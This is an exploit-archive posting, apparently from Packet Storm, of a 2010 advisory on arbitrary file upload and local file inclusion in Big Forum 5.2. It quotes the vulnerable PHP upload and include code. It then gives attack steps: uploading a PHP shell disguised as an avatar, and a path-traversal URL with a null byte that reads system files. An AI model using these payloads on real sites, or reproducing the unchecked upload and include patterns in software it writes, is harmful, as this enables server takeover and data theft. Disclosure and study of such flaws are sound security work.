exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Big Forum 5.2 Shell Upload / Local File Inclusion

Big Forum 5.2 Shell Upload / Local File Inclusion
Posted Jun 26, 2010
Authored by Zer0 Thunder

Big Forum version 5.2 suffers from local file inclusion and shell upload vulnerabilities.

tags | exploit, shell, local, vulnerability, file inclusion
SHA-256 | 5b7303c4822a22c842f844bc09abef70c6b23363fda5ea6748fef2983e191671

Big Forum 5.2 Shell Upload / Local File Inclusion

Change Mirror Download

=> Big Forum 5.2v Arbitrary File Upload & Local File Inclusion Vulnerability
=> Author : Zer0 Thunder
=> Home : http://colombohackers.com
=> Download : http://sourceforge.net/projects/npage-bigforum/files/bigforum%205.2/bf5.2.zip/download
=> Date : 06/24/2010



Arbitrary File Upload
---------------------



Vuln C0de

=============================================================================================================

if($_FILES['datei']['size'] < 102400)
{
move_uploaded_file($_FILES['datei']['tmp_name'], "images/avatar/".$_FILES['datei']['name']);
echo "Danke, dein Avatar wurde hochgeladen, es wird nun angezeigt.";
$pfad = $_FILES['datei']['name'];
mysql_query("UPDATE users SET ava_link = 'images/avatar/$pfad' WHERE username LIKE '". USER ."'");
}

you will have to register befor doing this

=============================================================================================================


Vuln Page link : http://localhost/bf/main.php?do=ava
(Upload the shell.php or shell.jpg.php )





Local File Inclusion
--------------------


=============================================================================================================
if($_GET["aktion"] == "install")
{
$path = "../includes/plugins/$_GET[datei]";
include($path);
plugin_install($kurzc, $_GET["datei"]);
echo "Danke, der Mod wurde erfolgreich installiert.";
exit;
}


=============================================================================================================


http://localhost/bf/admin/admin.php?do=mods&aktion=install&datei=../../../../../boot.ini%00






--------------------------------------
Msn : zer0_thunder@colombohackers.com
--------------------------------------
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close